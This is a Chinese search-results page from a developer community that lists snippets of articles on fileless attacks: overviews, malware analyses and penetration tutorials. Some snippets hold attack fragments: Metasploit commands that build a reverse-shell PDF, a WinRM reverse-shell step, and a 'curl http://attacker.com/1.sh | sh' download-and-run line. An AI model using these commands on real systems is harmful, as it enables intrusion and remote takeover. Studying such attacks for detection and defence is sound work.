- 综合排序
- 最热优先
- 最新优先
浅谈无文件攻击
浅谈无文件攻击简介与大多数恶意软件不同,“无文件”攻击并不会在目标计算机的硬盘中留下蛛丝马迹,而是直接将恶意代码写入内存或注册表中。由于没有病毒文件,传统基于文件扫描的防病毒软件很难侦测到它们的存在。 然而,“无文件”攻击的定义已经逐渐扩大化,那些需要依靠文件系统的某些功能来实现激活或驻留的恶意软件也已经包括在了“无文件”攻击的范畴中。无文件攻击属于高级持续性威胁(APT)的一种。 APT在无文件攻击之外,还包括0day漏洞利用、缓冲区溢出攻击、傀儡进程等基于内存的攻击,同时还包括内存webshell等攻击,这些攻击可以轻松绕过现有的安全防护体系,将恶意代码悄无声息地植入内存中。 利用注册表利用缓冲区漏洞的无文件攻击有一个弊端就是一旦进程或系统关闭,恶意攻击也就不复存在。 使用内存取证技术,分析内存中的恶意代码,提取攻击的特征和证据,追踪攻击的来源和目的。无文件攻击是一种隐蔽而危险的攻击方式,需要我们提高警惕,加强防护,及时应对。
83110编辑于 2024-03-21- 来自专栏网络安全攻防
无文件落地攻击
文章前言 所谓的"无文件落地攻击"是指恶意程序文件不直接落地到目标系统的磁盘空间中的一种攻击手法,常用于逃避传统的安全检测机制,本篇文章将就此进行简要介绍几种目前比较流行的无文件落地攻击手法。 hta文件,之后通过目标主机的mshta来远程下载并执行,从而实现无文件落地攻击,下面是具体的步骤: Step 1:使用msf的exploit/windows/misc/hta_server模块进行测试 在无文件落地攻击中的利用方式进行介绍,具体方法如下(至于进程隐藏有兴趣的可以自我查找一番): Step 1:运行JSRat监听本地5678端口 . 知识拓展 这里介绍一种在内网中常用的无文件落地攻击方法——WinRM无文件落地攻击!!! Windows Server 2012中通过WinRM实施无文件攻击,最终返回一个新的具备较高隐藏度的Windows Sever 2012的shell给我们的攻击主机,以供对内网进行深入拓展和利用 攻击步骤
2.4K40发布于 2021-07-21 - 来自专栏FreeBuf
浅析无文件攻击
写在前面的话 在信息安全领域中,“无文件攻击”属于一种影响力非常大的安全威胁。攻击者在利用这种技术实施攻击时,不会在目标主机的磁盘上写入任何的恶意文件,因此而得名“无文件攻击”。 接下来,我们一起分析一下无文件攻击所采用的攻击方法以及策略,我们会对无文件攻击所涉及到的特定技术进行介绍,并解释为什么这种攻击方式在大多数情况下不会被安全防御系统发现。 技术一:恶意文档 其实一开始,很多安全研究专家所称之为的“无文件攻击”实际上是会涉及到文档文件的。 参考资料 【参考资料一】【参考资料二】 技术二:恶意脚本 为了不将恶意代码编译成传统的可执行文件,攻击者会在攻击过程中使用具有“无文件”性质的“脚本文件”。 虽然在现代网络攻击活动中,无文件攻击只是其中的一种攻击技术,但很多恶意软件一般都会引入一些“无文件攻击”技术来尝试躲避安全产品的检测。
1.1K30发布于 2018-12-28 - 来自专栏FreeBuf
CrowdStrike | 无文件攻击白皮书
由于CrowdStrike邮件推送了“无文件攻击白皮书”《谁需要恶意软件?对手如何使用无文件攻击来规避你的安全措施》(Who Needs Malware? 03 作案工具:真实世界的无文件恶意软件 从上面的案例中,我们已经了解了端到端的无文件攻击是如何发生的。在攻击过程中,对手还可以结合其他技术,使用无文件工具和方法。 04 为何传统技术无法抵御无文件攻击 由于传统安全解决方案极难检测到无文件攻击,因此无文件攻击正在增加。让我们来看看,为什么当今市场上的一些端点保护技术,对这些无恶意软件入侵如此脆弱。 由于无文件攻击不使用PE文件,因此沙盒没有什么可爆破的。即便真有东西被发送到沙箱,因为无文件攻击通常会劫持合法进程,大多数沙箱也都会忽略它。 不幸的是,鉴于传统杀毒软件无法阻止无文件攻击,犯罪黑客越来越可能将注意力集中在这些隐形技术上。因此,安全专家需要在他们的安全策略中,考虑无文件恶意软件和无文件攻击的存在。
4.1K41发布于 2020-11-06 - 来自专栏FreeBuf
「无文件」攻击方式渗透实验
前几天看了一个文章《全球上百家银行和金融机构感染了一种“无文件”恶意程序,几乎无法检测》,觉得powershell很是神奇,自己希望亲手实验一下,以最大程度还原“无文件”攻击方式。 这套环境里面的192.168.1.108是黑客的kali攻击机,192.168.1.212是黑客的windows攻击机 科普下nishang和PowerSploit 1、Nishang是基于PowerShell CodeExecution/Invoke–Shellcode.ps1 如果git clone新版本的PowerSploit你要用老版本的CodeExecution/Invoke–Shellcode.ps1替换掉新版本的文件 * 科普一下csrf的攻击:CSRF:跨站请求伪造,也被称为:one click attack/session riding,缩写为:CSRF/XSRF,简单来说攻击者盗用了你的身份,以你的名义发送恶意请求 { wprintf(L"CommandLineToArgvW failed\n"); return0; } } …………………… 7.代码中不能有写文件的操作
2.7K90发布于 2018-02-23 - 来自专栏洛米唯熊
利用WinRM实现内网无文件攻击反弹shell
用Administrator账户登录攻击机器 前提知道被攻击方的用户登录账户密码 Windows操作系统中,默认是开启共享IPC$的 IP:192.168.124.30(server2016) IP :192.168.124.20(win7) IP:192.168.124.32(Kali) 0x02:攻击过程 ---- 一、快速在(server2016)运行winrm 命令:winrmquickconfig 成功 三、在(win7)中需要被远程访问的文件,开启文件共享。 ? 开启共享文件夹,并添加访问用户的权限,使其能够远程访问。 五、利用(server2016)的WinRM 实现内网无文件攻击反弹shell 1、在(server2016)中执行以下命令 winrm invoke create wmicimv2/win32_process
1.5K20发布于 2019-08-29 - 来自专栏黑白天安全团队
常见的windows下无文件落地攻击手法
什么是无文件攻击? 无文件下对抗传统杀毒软件(AV) 这里我们可以看看一下CrowdStrike中《无文件攻击白皮书》分析的”为何传统技术无法抵御无文件攻击“来快速理解一下无文件落地的意义: 由于传统安全解决方案极难检测到无文件攻击 ,因此无文件攻击正在增加。 由于无文件攻击不使用PE文件,因此沙盒没有什么可爆破的。即便真有东西被发送到沙箱,因为无文件攻击通常会劫持合法进程,大多数沙箱也都会忽略它。 无文件落地攻击的常用手法 一般来说在windows的能执行脚本或命令的组件都可以用来利用进行无文件落地攻击。
7.5K21发布于 2021-03-16 无文件攻击不再隐形,Trellix NDR + Wise 揭示攻击路径并引导修复
无文件横向移动,隐藏于系统信任之中的威胁网络攻击者的战术不断演变,试图绕过安全供应商的防护。如今的攻击者不再依赖传统的恶意软件,而是以“无文件”方式,利用受信任的系统组件,在网络中横向移动。 这种无文件横向移动,用传统的、仅监控终端或文件的安全解决方案很难检测到。攻击者可能使用有效凭证、避免写入磁盘,并伪装成正常的管理行为,使其操作看起来毫无异常。 即使是无文件攻击,也会在网络中留下痕迹。Trellix NDR 可以检测到异常的流量模式、配置错误的服务、可疑的横向移动行为。 图11:执行恶意载荷并将攻击者添加到管理员组图 12 展示了一个使用 SCShell 实现无文件横向移动的示例。 无文件横向移动活动 引发的两个警报。
21310编辑于 2025-10-22- 来自专栏FreeBuf
揭秘基于注册表隐藏的无文件攻击
*本文原创作者:ArkTeam 发展 一直以来,文件是恶意代码存在的最常见形式,安全软件也通常把磁盘上的文件作为重点检测对象。然而,一旦恶意代码以无文件形式存储在系统中,便难以对其追踪。 早在十几年前,红色代码、Slammer蠕虫就利用缓冲区溢出进行攻击,通过网络传播,完全存在于内存之中,而不以文件作为载体。 不过,这种基于内存的无文件(Fileless)攻击一旦进程或系统关闭,也就不复存在。 随后,多款恶意程序甚至APT组织使用这种无文件持久化攻击技术。 ? 攻击流程 ? 结束语 基于注册表的无文件攻击利用操作系统特性来达到数据隐藏的意图,并将恶意程序运行在合法进程之中,这种方式能让基于文件监测的查杀手段失效,为此安全厂商们也积极做出响应,然而随着技术的进一步发展,恶意代码的隐藏方式很可能并不只局限于
2.1K50发布于 2018-02-08 - 来自专栏公共互联网反网络钓鱼(APCN)
基于SVG文件的新型无文件攻击路径分析与防御体系构建研究
然而,其内嵌脚本与动态加载能力亦被攻击者利用,形成一种新型的“双用途”攻击载体。近期VirusTotal平台披露44个零检测恶意SVG样本,暴露了传统安全检测机制在图像类文件处理上的结构性盲区。 本文系统分析此类攻击的技术原理、传播路径与规避机制,指出其利用内联脚本、事件触发与资源外链实现无文件载荷投递的攻击范式。 关键词: SVG安全;无文件攻击;零检测样本;内容安全策略;攻击检测盲区;网络安全防御1. 引言在现代网络安全防御体系中,文件类型识别与恶意代码扫描是威胁检测的基础环节。 典型攻击流程如下:构造恶意SVG:在图形设计工具或文本编辑器中创建SVG文件,嵌入混淆后的JavaScript代码。 规避检测机制:文件扩展名为.svg,MIME类型为image/svg+xml,多数安全代理默认信任;内容为纯文本,无PE结构或典型恶意文件特征;脚本经混淆或延迟执行,静态扫描难以识别语义。
34410编辑于 2025-10-30 - 来自专栏FreeBuf
SQL Server Transact-SQL 的无文件攻击姿势
背景概述 近日,深信服安全团队捕获到一起绕过杀毒软件的无文件攻击事件,被入侵的主机或服务器会被安装Mykings、Mirai、暗云等多种僵尸网络木马及挖矿程序,并且难以彻底清除。 排查过程 排查主机上的恶意文件、启动项等,发现执行恶意脚本的WMI,功能是下载文件到本地执行: ? ? 顺手逛一下查杀到恶意exe文件的目录,发现两个dvr后缀的文件,打开一看果不其然,包含了用于下载恶意文件的命令: ? ? 可以看到,上一次排查时发现的恶意文件、WMI、注册表等项都可以在表格中找到生成语句,并且还有一些没有排查到的文件,可能被防病毒软件识别清除了。 病毒文件分析 将十六进制数据拷贝出来转换为PE文件,是一个用C#编写的DLL文件,通过MyDownloadFile方法读取指定URL网页的内容: ?
1.3K10发布于 2019-05-21 - 来自专栏Khan安全团队
无文件PELoader
https://github.com/TheD1rkMtr/FilelessPELoader
65430编辑于 2023-02-23 - 来自专栏渗透云笔记
PDF文件攻击
调用meterpreter载荷,反向连接到攻击机 set payload windows/meterpreter/reverse_tcp 4. 设置生成的文件名 set FILENAME 0000.pdf 8. 执行生成文件 Run(exploit) ? 注:生成的文件在隐藏的文件夹中,须将隐藏去掉。 ? ? 但这类漏洞因为PDF沙箱的原因也有着很大的局限性,往往是需要配合系统的提权漏洞一起使用才能进行完整的攻击过程,所以投入的成本较高在这几年来出现的完整攻击样本较少。 所以平时要小心陌生的文件,在打开前要明确来源,或使用杀毒软件进行杀毒。尽量保证电脑的软件处于最新版本,这样才能最大程度较低被攻击的概率。 不过想必大家现在的电脑上都是360全家桶,一般不会再像早期互联网那时的情况一样出现这种简单粗暴的攻击。 ?
2.9K30发布于 2020-03-12 - 来自专栏Python和安全那些事
恶意代码分析:2.LNK文件伪装成证书传播RokRAT恶意软件(含无文件攻击)
这篇文章将翻译一篇LNK文件发起的恶意攻击,主要是LNK文件伪装成证书执行RokRAT恶意软件,并利用Powershell命令发起无文件攻击和执行相关行为。基础性技术文章,希望您喜欢! 受感染的文本编辑器notepad++ [译文] 恶意代码分析:2.LNK文件伪装成证书传播RokRAT恶意软件(含无文件攻击) 声明:本人坚决反对利用工具或渗透技术进行犯罪的行为,一切犯罪行为必将受到严惩 RokRAT恶意软件的简化操作过程如下所示,是一种比较常见的LNK攻击: 通过Email发起鱼叉式钓鱼攻击,包括恶意LNK文件(可执行Powershell) 整个LNK文件包含:正常PDF文件、viwer.dat 、search.dat、find.bat 发起RokRAT无文件攻击,利用云端API收集用户信息 更详细的描述如下: (1)当LNK文件被执行时,它会运行PowerShell命令来创建并执行一个合法的文档文件 接着,“search.dat”以无文件攻击的方式读取并执行“viewer.dat”文件。
82610编辑于 2024-05-17 - 来自专栏安全领域
关于新型的无文件网络攻击,你需要知道的5件事
这些攻击有着许多的名字,“无文件攻击”是最常见的一种方式,但也会用"非恶意软件攻击"和"伪装攻击"(适应性攻击)。 所以,这些攻击很快就成为了IT和信息安全专业人员的头号威胁。 为了更加清楚了解无文件攻击的构成和工作原理,下面是每个业务负责人应该知道的5件事: 1.无文件攻击利用的是网络端口安全上的一个基本漏洞。 利用易受攻击的应用程序并将代码注入正常的系统进程都是最常用的无文件攻击方式,在机器上获取访问和执行而不会引起注意。 从这里开始,攻击者使用PowerShell直接在内存中执行恶意代码,使得攻击真正无文件化。 5.预防无文件攻击。 虽然无文件技术极难检测,但可以采取一些措施来保护业务并降低风险。好的第一步是禁用组织未主动使用的管理工具,或者至少限制其权限和功能。
69420发布于 2018-08-01 - 来自专栏前沿安全技术
针对Model X无钥匙系统的远程攻击
本研究是针对特斯拉 Model X 无钥匙系统的实用安全评估。所分析的无钥匙系统采用了由通用标准认证的安全元件实现的安全对称密钥和公钥密码原语。 遥控钥匙可用于通过按下按钮来锁定和解锁汽车,这被称为远程无钥匙进入 (RKE,Remote Keyless Entry)。 这些示例表明,Model X遥控钥匙上的OAD服务缺陷可能允许攻击者覆盖固件并获得远程代码执行。Toolbox 软件可以用于更新遥控钥匙固件,因此它包含了最新固件二进制文件的备份。 从这个实验中可以清楚地看出,遥控钥匙没有验证提供的固件二进制文件的真实性。这种不安全的固件更新(或 OAD)实现允许攻击者覆盖 CC2541 SoC 执行的固件。 生成恶意固件映像后,更新了 CRC 和 SHA1 哈希以获得有效的固件二进制文件,该文件可以在攻击的第二步中与 OAD 一起使用。
1.3K31编辑于 2023-06-24 - 来自专栏FreeBuf
Netwalker无文件勒索软件分析
攻击者正不断研究更复杂的方式逃避恶意软件检测,近期发现攻击者利用PowerShell编写Netwalker勒索软件,直接在内存中执行,没有将实际的勒索软件二进制文件存储到磁盘中。 最后删除副本,防止受害者使用副本恢复文件。 ? 无文件勒索软件分析 Netwalker使用6个随机字符作为扩展名重命名加密文件: ? 它通常会避免对关键文件,可执行文件,动态链接库,注册表或其他与系统相关的文件进行加密,防止系统完全失效。 总结与建议 攻击者现在正在向勒索软件中添加反射DLL注入,从而使攻击难以被安全分析人员分析追踪。勒索软件本身对组织就具有很大的危害,成为无文件攻击后,其风险再次加大。 以下是避免被勒索软件攻击的一些建议: 定期备份关键数据,减轻勒索软件攻击的影响; 安装来自操作系统和第三方供应商的最新软件补丁; 遵守良好的邮件和网站安全规范; 及时发现警告可疑的电子邮件和文件; 在端点上实施应用程序白名单
1.6K20发布于 2020-06-20 - 来自专栏卓越笔记
Linux scp 无密码复制文件
目的:本地服务器(local)复制文件到远程服务器(remote) 本地服务器:local 远程服务器:remote (192.168.1.254) 1. 在 local 上运行 ssh-keygen -t rsa 在 /root/.ssh 下生成 id_rsa 和 id_rsa.pub 两个文件 2. 在 local 上运行 ssh-keygen -t rsa 在 /root/.ssh 下生成 id_rsa 和 id_rsa.pub 两个文件 4. 使用 cat id_rsa.pub.L >> authorized_keys 把 local 的 公钥 写入到 authorized_keys 文件中 6. 然后在 local 上就可以无密码使用 scp 复制文件到 remote 了(scp <file> root@192.168.1.254:/home/downloads)
6.3K50编辑于 2023-02-18 - 来自专栏FreeBuf
无文件加密挖矿软件GhostMiner
早在2017年,已经观察到他们如何应用无文件技术使检测和监测更加困难。 8月观察到一个名为ghostminer的无文件加密货币挖掘恶意软件,该软件利用无文件技术和windows管理工具(wmi)。 还观察到GhostMiner 变体修改了被Mykings、PowerGhost、PCASTLE和BuleHub等感染的主机文件。 另一个命令脚本函数wmi_checkhosts能够修改受感染计算机的主机文件。 ? 同时,ccbot使用两个ip地址,即118.24.63.208和103.105.59.68作为c&c服务器。 然后ghostminer将追加2130字节的随机值,该文件将保存为C:\windows\temp\lsass.exe。 恶意软件随后将执行以下命令: ? IOCs ?
1.8K00发布于 2019-10-10 - 来自专栏逢魔安全实验室
Linux无文件渗透执行ELF
注:本文仅用于知识分享,请勿用于非法攻击,任何后果与本团队无关。 01 简介 在进行Linux系统的攻击应急时,大家可能会查看pid以及/proc相关信息,比如通过/proc/$pid/cmdline查看某个可疑进程的启动命令,通过/proc/$pid/ exe抓样本等,但是攻击者是否会通过某种类似于curl http://attacker.com/1.sh | sh的方法来执行elf二进制文件呢? 这就是可以被攻击者所利用的,如果有办法将需要执行elf通过memfd_create(2)写入内存中进行执行的话就可以达到我们的目的。 ? 可以看到我们的elf文件最终以匿名文件的方式在内存中被加载执行了,从匿名文件运行的程序与运行于普通文件的程序之间唯一真正的区别是/proc/pid/exe符号链接。
6.4K80发布于 2018-05-15
腾讯云开发者
Copyright © 2013 - 2026 Tencent Cloud. All Rights Reserved. 腾讯云 版权所有
深圳市腾讯计算机系统有限公司 ICP备案/许可证号:粤B2-20090059 
粤公网安备44030502008569号
腾讯云计算(北京)有限责任公司 京ICP证150476号 | 京ICP备11018762号